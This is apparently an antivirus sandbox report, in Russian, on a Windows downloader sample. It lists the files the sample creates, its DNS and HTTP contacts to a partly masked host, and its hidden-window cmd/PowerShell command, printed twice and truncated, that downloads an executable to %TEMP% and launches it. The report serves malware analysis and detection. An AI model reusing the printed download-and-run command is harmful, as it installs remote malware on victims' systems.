Техническая информация
Вредоносные функции
Загружает и запускает на исполнение
- $okqlaxrdyrx как %temp%\qrjcmek.exe
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function hpvwiof3([String] $Okqlaxrdyrx){(New-Object System.Net.WebClient).DownloadFile($Okqlaxrdyrx,''%TEMP%\qrjcmek.exe'');Start-Process ''%TEMP%\qrjcmek.exe'';}t...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\tecxopjcbaw5.bat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
Сетевая активность
Подключается к
- 'sw######mmars.vonmammen.org':80
TCP
Запросы HTTP GET
- http://sw######mmars.vonmammen.org/dump/surarsors.png
UDP
- DNS ASK we###opnumij.nl
- DNS ASK sw######mmars.vonmammen.org
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\tecxopjcbaw5.bat" " (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function hpvwiof3([String] $Okqlaxrdyrx){(New-Object System.Net.WebClient).DownloadFile($Okqlaxrdyrx,''%TEMP%\qrjcmek.exe'');Start-Process ''%TEMP%\qrjcmek.exe'';}t... (со скрытым окном)
